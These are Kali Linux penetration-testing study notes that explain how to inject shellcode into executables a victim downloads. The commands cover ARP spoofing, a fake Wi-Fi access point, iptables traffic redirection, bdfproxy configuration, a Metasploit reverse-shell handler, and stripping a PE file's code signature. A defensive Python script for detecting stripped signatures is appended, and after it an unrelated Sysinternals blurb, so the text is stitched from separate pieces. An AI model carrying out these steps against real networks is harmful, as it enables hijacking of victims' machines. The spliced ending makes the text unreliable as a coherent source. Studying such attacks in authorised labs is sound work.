This article records the detailed process of learning and using Kali Linux 2018.1 for penetration testing. The material follows the course "Kali Linux Penetration Testing" from the Security Niu Classroom.
1. Introduction
Bdfproxy (built on mitmproxy)
- Dynamic shellcode injection into executables downloaded by the victim, built on traffic hijacking (a man-in-the-middle position obtained by ARP spoofing, DNS spoofing, or a fake AP)
Steps
- sysctl -w net.ipv4.ip_forward=1
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 (and the same rule again for --dport 443; iptables does not accept "80/443" in one rule)
- vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
- set the HOST entries to the listening IP address of bdfproxy
- arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
- start msf
Process
- mana creates a fake AP
- bdfproxy injects code into the proxied downloads
- msf listens for the reverse shell
2. Usage
Enable IP forwarding
root@kali:~# vim /etc/sysctl.conf
net.ipv4.ip_forward=1
(then run sysctl -p so the setting takes effect without a reboot)
Modify iptables
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
Modify the configuration file
root@kali:~# vim /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
HOST = 10.10.10.131   # lines 108, 117 and 128; replace all occurrences, there are 6 of them
Start bdfproxy
root@kali:~# bdfproxy
Start msfconsole
root@kali:~# msfconsole -r /root/bdfproxy_msf_resource.rc
msf exploit(multi/handler) > jobs
ARP spoofing
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 10.10.10.2
The target machine opens a browser, downloads the software and runs it
![](https://i.imgur.com/1qLFgFZ.png)
3. Wireless traffic hijacking
vi /etc/mana-toolkit/hostapd-mana.conf
- Modify the wireless SSID name
/usr/share/mana-toolkit/run-mana/start-nat-simple.sh
- Set wlan1 as the wireless network adapter in the script and start it
- iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j REDIRECT --to-ports 8080 (repeat for --dport 443)
vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
- Modify the listening IP address and start bdfproxy
Start msf
- msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
Additional notes
- Site-wide HTTPS defeats this injection (every Microsoft patch is code-signed)
- The certificate signature of a PE file can be cleared
- PE Header -> Optional Header -> Certificate Table (address and size)
- Overwrite both fields with 0
- BDF clears the digital signature by default
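As an added defensive check (not part of the course notes, BDF or bdfproxy), the following Python reads the Certificate Table entry of a PE file's Optional Header and reports whether it is present or has been zeroed as described above; a Windows binary that should carry an Authenticode signature but has an empty entry is worth quarantining and re-downloading over HTTPS. The header produced by build_pe32 is a constructed minimal PE32 header for testing, not a real executable.

```python
import struct

CERT_TABLE_INDEX = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY in the data directory


def certificate_table(pe: bytes):
    """Return (file_offset, size) of the Authenticode certificate table,
    or None when the entry is absent or zeroed (signature stripped/unsigned)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:    # PE32: NumberOfRvaAndSizes at +92, directories at +96
        count_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:  # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        count_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", pe, count_off)[0]
    if n_dirs <= CERT_TABLE_INDEX:
        return None  # too few directories: no certificate table at all
    # For the security directory the first field is a raw file offset, not an RVA
    off, size = struct.unpack_from("<II", pe, dirs_off + 8 * CERT_TABLE_INDEX)
    return None if off == 0 and size == 0 else (off, size)


def signature_present(pe: bytes) -> bool:
    """True when the file still declares an Authenticode certificate table."""
    return certificate_table(pe) is not None


def build_pe32(cert_off: int, cert_size: int) -> bytes:
    """Constructed minimal PE32 header (DOS stub, COFF header, optional header,
    16 data directories) for testing; not a loadable executable."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0)
    opt = struct.pack("<H", 0x10B) + b"\0" * 90 + struct.pack("<I", 16)
    dirs = bytearray(8 * 16)
    struct.pack_into("<II", dirs, 8 * CERT_TABLE_INDEX, cert_off, cert_size)
    return dos + coff + opt + bytes(dirs)


if __name__ == "__main__":
    for label, pe in (("signed", build_pe32(0x2000, 0x1800)), ("stripped", build_pe32(0, 0))):
        print(label, "->", certificate_table(pe))
```

On real files, read the bytes from disk and treat a None result on a vendor binary that is normally signed as a reason to verify the download, not as proof of tampering by itself.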
https://live.sysinternals.com/
This is the file share that allows access to all Sysinternals utilities. We have developed this to test an alternative distribution mechanism for our utilities.
This will allow you to run these tools from any computer connected to the Internet without navigating to a web page, downloading and unzipping the zip file.
The Sysinternals website was created by Mark Russinovich in 1996 to host his advanced system utilities and technical information. Whether you are an IT professional or a developer, you can find Sysinternals utilities to help you manage, troubleshoot and diagnose Windows systems and applications.